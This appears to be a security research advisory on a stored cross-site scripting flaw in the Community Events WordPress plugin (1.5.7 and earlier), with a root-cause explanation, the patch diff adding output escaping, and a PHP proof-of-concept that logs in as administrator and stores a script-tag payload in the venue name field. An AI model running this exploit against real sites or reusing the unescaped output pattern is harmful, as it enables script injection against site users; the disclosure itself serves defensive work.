Atomic Edge analysis of CVE-2026-1649:
The Community Events WordPress plugin version 1.5.7 and earlier contains an authenticated stored cross-site scripting vulnerability. The flaw exists in the venue management interface, allowing administrators to inject malicious scripts via the ‘ce_venue_name’ parameter. The vulnerability has a CVSS score of 4.4 and requires administrator-level access for exploitation.
The root cause is insufficient output escaping when rendering venue data in multiple plugin contexts. The vulnerable code paths are in community-events.php lines 1401, 1449, 1615, 1961, and 2124. These lines directly echo user-controlled venue name data without proper escaping. The ‘ce_venue_name’ parameter value flows from form input through database storage to output rendering without adequate sanitization. The stripslashes() function alone does not provide XSS protection.
Exploitation requires an authenticated administrator to access the venue management page at /wp-admin/admin.php?page=community-events-venues. The attacker submits a malicious payload in the ‘ce_venue_name’ field during venue creation or editing. The payload persists in the database and executes when any user views pages containing the injected venue data, including the main events listing and venue tooltips.
The patch in version 1.5.8 adds proper escaping functions to all venue data output contexts. The changes wrap venue name outputs with esc_html() in lines 1401, 1449, 1615, 1961, and 2124. The patch also adds esc_html() to other venue fields like address, city, zip code, phone, and email. For URL fields, the patch uses esc_url() instead. These functions encode HTML special characters, preventing script execution while preserving data display.
Successful exploitation allows attackers with administrator privileges to inject arbitrary JavaScript that executes in victims’ browsers. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. The stored nature means the payload affects all users who view pages containing the compromised venue data, potentially enabling widespread compromise of the WordPress installation.
--- a/community-events/community-events.php
+++ b/community-events/community-events.php
@@ -2,7 +2,7 @@
/*Plugin Name: Community Events
Plugin URI: https://ylefebvre.github.io/wordpress-plugins/community-events/
Description: A plugin used to manage events and display them in a widget
-Version: 1.5.7
+Version: 1.5.8
Author: Yannick Lefebvre
Author URI: https://ylefebvre.github.io
Copyright 2025 Yannick Lefebvre (email : ylefebvre@gmail.com)
@@ -1400,34 +1400,34 @@
<table style='width: 100%'>
<tr>
<td><?php _e( 'Venue Name', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_name" <?php if ($mode == "edit") echo 'value="' . stripslashes($selectedvenue->ce_venue_name) . '"';?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_name" <?php if ($mode == "edit") echo 'value="' . esc_html( stripslashes( $selectedvenue->ce_venue_name ) ) . '"';?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue Address', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_address" <?php if ($mode == "edit") echo "value='" . stripslashes($selectedvenue->ce_venue_address) . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_address" <?php if ($mode == "edit") echo "value='" . esc_html( stripslashes( $selectedvenue->ce_venue_address ) ) . "'";?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue City', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_city" <?php if ($mode == "edit") echo "value='" . stripslashes($selectedvenue->ce_venue_city) . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_city" <?php if ($mode == "edit") echo "value='" . esc_html( stripslashes( $selectedvenue->ce_venue_city ) ). "'";?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue Zip Code', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_zipcode" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_zipcode . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_zipcode" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_zipcode ) . "'";?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue Phone', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_phone" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_phone . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_phone" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_phone ) . "'";?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue E-mail', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_email" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_email . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_email" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_email ) . "'";?>/></td>
</tr>
<tr>
<td><?php _e( 'Venue URL', 'community-events' ); ?></td>
- <td><input style="width:95%" type="text" name="ce_venue_url" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_url . "'";?>/></td>
+ <td><input style="width:95%" type="text" name="ce_venue_url" <?php if ($mode == "edit") echo "value='" . esc_url( $selectedvenue->ce_venue_url ) . "'";?>/></td>
</tr>
</table>
- <input type="hidden" name="ce_venue_id" value="<?php if ($mode == "edit") echo $selectedvenue->ce_venue_id; ?>" />
+ <input type="hidden" name="ce_venue_id" value="<?php if ($mode == "edit") echo intval( $selectedvenue->ce_venue_id ); ?>" />
</td>
<td style='width:55%; vertical-align: top;'>
<?php $venues = $wpdb->get_results("SELECT count( e.event_id ) AS nbitems, v.ce_venue_id, v.ce_venue_name FROM " . $wpdb->prefix . "ce_venues v LEFT JOIN " . $wpdb->prefix . "ce_events e ON e.event_venue = v.ce_venue_id GROUP BY v.ce_venue_id ORDER by v.ce_venue_name");
@@ -1447,11 +1447,11 @@
<?php foreach($venues as $venue): ?>
<tr>
- <td class='name column-name' style='background: #FFF'><?php echo $venue->ce_venue_id; ?></td>
- <td style='background: #FFF'><a href='admin.php?page=community-events-venues&editvenue=<?php echo $venue->ce_venue_id; ?>'><strong><?php echo stripslashes($venue->ce_venue_name); ?></strong></a></td>
- <td style='background: #FFF;text-align:right'><?php echo $venue->nbitems; ?></td>
- <?php if ($venue->nbitems == 0): ?>
- <td style='background:#FFF'><a href='admin.php?page=community-events-venues&deletevenue=<?php echo $venue->ce_venue_id; ?>&_wpnonce=<?php echo wp_create_nonce( 'ce_delete_venue' ); ?>'
+ <td class='name column-name' style='background: #FFF'><?php echo intval( $venue->ce_venue_id ); ?></td>
+ <td style='background: #FFF'><a href='admin.php?page=community-events-venues&editvenue=<?php echo intval( $venue->ce_venue_id ); ?>'><strong><?php echo esc_html( stripslashes( $venue->ce_venue_name ) ); ?></strong></a></td>
+ <td style='background: #FFF;text-align:right'><?php echo intval( $venue->nbitems ); ?></td>
+ <?php if ( $venue->nbitems == 0 ): ?>
+ <td style='background:#FFF'><a href='admin.php?page=community-events-venues&deletevenue=<?php echo intval( $venue->ce_venue_id ); ?>&_wpnonce=<?php echo wp_create_nonce( 'ce_delete_venue' ); ?>'
<?php echo "onclick="if ( confirm('" . esc_js(sprintf( __("You are about to delete this venue '%s'n 'Cancel' to stop, 'OK' to delete.", 'community-events' ), $venue->ce_venue_name )) . "') ) { return true;}return false;"" ?>><img src='<?php echo $this->cepluginpath; ?>/icons/delete.png' /></a></td>
<?php else: ?>
<td style='background: #FFF'></td>
@@ -1614,7 +1614,7 @@
else
$selectedstring = "";
- echo "<option value='" . $venue->ce_venue_id . "' " . $selectedstring . ">" . stripslashes($venue->ce_venue_name) . "n";
+ echo "<option value='" . $venue->ce_venue_id . "' " . $selectedstring . ">" . esc_html( stripslashes( $venue->ce_venue_name ) ) . "n";
}
?></select></td>
</tr>
@@ -1960,23 +1960,23 @@
if ($event['ce_venue_name'] != "")
{
- $output .= '<span class="cetooltip ce-venue-name" title="<strong>' . stripslashes($event['ce_venue_name']) . '</strong><br />' . stripslashes($event['ce_venue_address']) . '<br />' . stripslashes($event['ce_venue_city']) . '<br />' . $event['ce_venue_zipcode'] . '<br />' . $event['ce_venue_email'] . '<br />' . $event['ce_venue_phone'] . '<br />' . $event['ce_venue_url'] . '">';
+ $output .= '<span class="cetooltip ce-venue-name" title="<strong>' . esc_html( stripslashes( $event['ce_venue_name'] ) ) . '</strong><br />' . esc_html( stripslashes( $event['ce_venue_address'] ) ) . '<br />' . esc_html( stripslashes( $event['ce_venue_city'] ) ) . '<br />' . esc_html( $event['ce_venue_zipcode'] ) . '<br />' . esc_html( $event['ce_venue_email'] ) . '<br />' . esc_html( $event['ce_venue_phone'] ) . '<br />' . esc_url( $event['ce_venue_url'] ) . '">';
if ($fullscheduleurl != '')
- $output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . $event['ce_venue_id'] . "'>n";
+ $output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . intval( $event['ce_venue_id'] ) . "'>n";
- $output .= stripslashes($event['ce_venue_name']);
+ $output .= esc_html( stripslashes( $event['ce_venue_name'] ) );
- if ($fullscheduleurl != '')
+ if ( $fullscheduleurl != '' )
$output .= "</a>";
- if ($event['ce_venue_city'] != "")
+ if ( $event['ce_venue_city'] != "" )
{
$output .= " / ";
if ($fullscheduleurl != '')
- $output .= "<a href='" . $fullscheduleurl . "?locationset=1&location=" . $event['ce_venue_city'] . "'>n";
+ $output .= "<a href='" . $fullscheduleurl . "?locationset=1&location=" . esc_html( $event['ce_venue_city'] ) . "'>n";
- $output .= $event['ce_venue_city'];
+ $output .= esc_html( $event['ce_venue_city'] );
if ($fullscheduleurl != '')
$output .= "</a>";
@@ -2123,14 +2123,14 @@
$output .= "</span> ";
- if ($events[$randomevent]['ce_venue_name'] != "")
+ if ( $events[$randomevent]['ce_venue_name'] != "" )
{
- $output .= '<span class="cetooltip ce-venue-name" title="<strong>' . stripslashes($events[$randomevent]['ce_venue_name']) . '</strong><br />' . stripslashes($events[$randomevent]['ce_venue_address']) . '<br />' . stripslashes($events[$randomevent]['ce_venue_city']) . '<br />' . $events[$randomevent]['ce_venue_zipcode'] . '<br />' . $events[$randomevent]['ce_venue_email'] . '<br />' . $events[$randomevent]['ce_venue_phone'] . '<br />' . $events[$randomevent]['ce_venue_url'] . '">';
+ $output .= '<span class="cetooltip ce-venue-name" title="<strong>' . esc_html( stripslashes( $events[$randomevent]['ce_venue_name'] ) ) . '</strong><br />' . esc_html( stripslashes( $events[$randomevent]['ce_venue_address'] ) ) . '<br />' . esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_zipcode'] ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_email'] ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_phone'] ) . '<br />' . esc_url( $events[$randomevent]['ce_venue_url'] ) . '">';
if ($fullscheduleurl != '')
- $output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . $events[$randomevent]['ce_venue_id'] . "'>n";
+ $output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . intval( $events[$randomevent]['ce_venue_id'] ) . "'>n";
- $output .= stripslashes($events[$randomevent]['ce_venue_name']);
+ $output .= esc_html( stripslashes( $events[$randomevent]['ce_venue_name'] ) );
if ($fullscheduleurl != '')
$output .= "</a>";
@@ -2140,9 +2140,9 @@
$output .= " / ";
if ($fullscheduleurl != '')
- $output .= "<a href='" . $fullscheduleurl . "?locationset=1&location=" . stripslashes($events[$randomevent]['ce_venue_city']) . "'>n";
+ $output .= "<a href='" . $fullscheduleurl . "?locationset=1&location=" . esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) ) . "'>n";
- $output .= stripslashes($events[$randomevent]['ce_venue_city']);
+ $output .= esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) );
if ($fullscheduleurl != '')
$output .= "</a>";
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1649 - Community Events <= 1.5.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'ce_venue_name' Parameter
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';
// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Execute login and capture cookies
$response = curl_exec($ch);
// Check if login was successful by looking for admin dashboard
if (strpos($response, 'wp-admin') === false) {
die('Login failed. Check credentials.');
}
// Navigate to the Community Events venue management page to get nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=community-events-venues');
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);
// Extract nonce from the venue creation form (simplified - in real scenario use proper parsing)
// The form contains a nonce field named '_wpnonce' for venue creation
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
die('Could not extract nonce from venue management page.');
}
// XSS payload to demonstrate vulnerability
$xss_payload = '<script>alert("Atomic Edge XSS Test - CVE-2026-1649");</script>';
// Submit venue creation form with malicious payload
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=community-events-venues');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'ce_venue_name' => $xss_payload,
'ce_venue_address' => 'Test Address',
'ce_venue_city' => 'Test City',
'ce_venue_zipcode' => '12345',
'ce_venue_phone' => '555-1234',
'ce_venue_email' => 'test@example.com',
'ce_venue_url' => 'http://example.com',
'addvenue' => 'Add Venue',
'_wpnonce' => $nonce
]));
$response = curl_exec($ch);
// Check if venue was created successfully
if (strpos($response, $xss_payload) !== false) {
echo 'Vulnerability confirmed: XSS payload stored in database.n';
echo 'Visit the events page or venue management page to see script execution.n';
} else {
echo 'Venue creation may have failed or site is patched.n';
}
curl_close($ch);
?>
